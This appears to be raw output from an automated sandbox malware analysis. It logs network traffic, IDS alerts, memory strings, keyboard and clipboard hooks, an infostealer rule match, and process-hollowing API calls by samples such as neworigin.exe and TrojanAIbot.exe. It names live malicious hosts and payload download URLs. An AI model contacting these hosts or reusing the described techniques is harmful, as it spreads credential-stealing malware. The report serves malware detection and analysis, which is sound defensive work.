                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 51.195.88.199 51.195.88.199
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:50629
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.8
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.le7
                      Source: neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000004.00000002.2209045342.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2191475072.0000000021E50000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2129637377.0000000000986000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2192001973.0000000021FFF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002BF7000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000B.00000000.2121761760.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000019.00000002.2273295756.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001A.00000000.2241974953.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001D.00000002.2353180844.0000000002CB2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001E.00000000.2324372148.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000E.00000002.2212077156.00000000050ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: x.exe, 00000004.00000002.2126176510.0000000000932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/O
                      Source: x.exe, 00000004.00000002.2182528595.0000000020B7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysx
                      Source: x.exe, 00000004.00000002.2182528595.0000000020B93000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: x.exe, 00000004.00000002.2126176510.00000000008BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss&
                      Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssexe
                      Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_WisrysxlfssyjHq
                      Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49755 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: neworigin.exe.11.dr, cPKWk.cs.Net Code: I3Mi2zn6x
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: server_BTC.exe.11.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: TrojanAIbot.exe.13.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA8670 NtUnmapViewOfSection,4_2_02DA8670
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA8400 NtReadVirtualMemory,4_2_02DA8400
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA7A2C NtAllocateVirtualMemory,4_2_02DA7A2C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02DADC8C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02DADC04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA7D78 NtWriteVirtualMemory,4_2_02DA7D78
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02DA8D70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02DADD70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA7A2A NtAllocateVirtualMemory,4_2_02DA7A2A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02DADBB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02DA8D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB8670 NtUnmapViewOfSection,25_2_02CB8670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB8400 NtReadVirtualMemory,25_2_02CB8400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB7A2C NtAllocateVirtualMemory,25_2_02CB7A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB7D78 NtWriteVirtualMemory,25_2_02CB7D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,25_2_02CB8D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CBDD70 NtOpenFile,NtReadFile,NtClose,25_2_02CBDD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB86F7 NtUnmapViewOfSection,25_2_02CB86F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB7AC9 NtAllocateVirtualMemory,25_2_02CB7AC9
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB7A2A NtAllocateVirtualMemory,25_2_02CB7A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,25_2_02CB8D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C48670 NtUnmapViewOfSection,29_2_02C48670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C48400 NtReadVirtualMemory,29_2_02C48400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C47A2C NtAllocateVirtualMemory,29_2_02C47A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C48D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,29_2_02C48D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,29_2_02C4DD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C47D78 NtWriteVirtualMemory,29_2_02C47D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C47AC9 NtAllocateVirtualMemory,29_2_02C47AC9
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C47A2A NtAllocateVirtualMemory,29_2_02C47A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C4DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,29_2_02C4DBB0
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C4DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,29_2_02C4DC8C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C4DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,29_2_02C4DC04
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C48D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,29_2_02C48D6E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DAF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,4_2_02DAF7C8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D920C44_2_02D920C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9C9774_2_02D9C977
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_028941C812_2_028941C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_0289EA8012_2_0289EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_02894A9812_2_02894A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_02893E8012_2_02893E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_0289DF0012_2_0289DF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_0289DF0012_2_0289DF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_0289A98812_2_0289A988
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065B47CC12_2_065B47CC
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065B67F112_2_065B67F1
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065B1F0012_2_065B1F00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065B5AF912_2_065B5AF9
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065B5B0812_2_065B5B08
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C7E7812_2_065C7E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C66E812_2_065C66E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C56B812_2_065C56B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065CC2A012_2_065CC2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065CB32A12_2_065CB32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C317812_2_065C3178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C779812_2_065C7798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065CE4C012_2_065CE4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C5DDF12_2_065C5DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C235012_2_065C2350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C004012_2_065C0040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 12_2_065C002512_2_065C0025
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 13_2_015E85C813_2_015E85C8
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 13_2_015E85B713_2_015E85B7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06B5B49014_2_06B5B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06B5B47014_2_06B5B470
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05E4336018_2_05E43360
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 22_2_014513D822_2_014513D8
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 25_2_02CA20C425_2_02CA20C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027D41C827_2_027D41C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027D4A9827_2_027D4A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027DEA8027_2_027DEA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027D3E8027_2_027D3E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027DDF0027_2_027DDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027DDF0027_2_027DDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027DA98827_2_027DA988
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027D0C8D27_2_027D0C8D
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_027D0D5827_2_027D0D58
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_06411F0027_2_06411F00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_06427E7827_2_06427E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_064266E827_2_064266E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_064256B827_2_064256B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642C2A027_2_0642C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642B32A27_2_0642B32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642317827_2_06423178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642779827_2_06427798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642E4C027_2_0642E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_06425DDF27_2_06425DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642235027_2_06422350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642004027_2_06420040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 27_2_0642002527_2_06420025
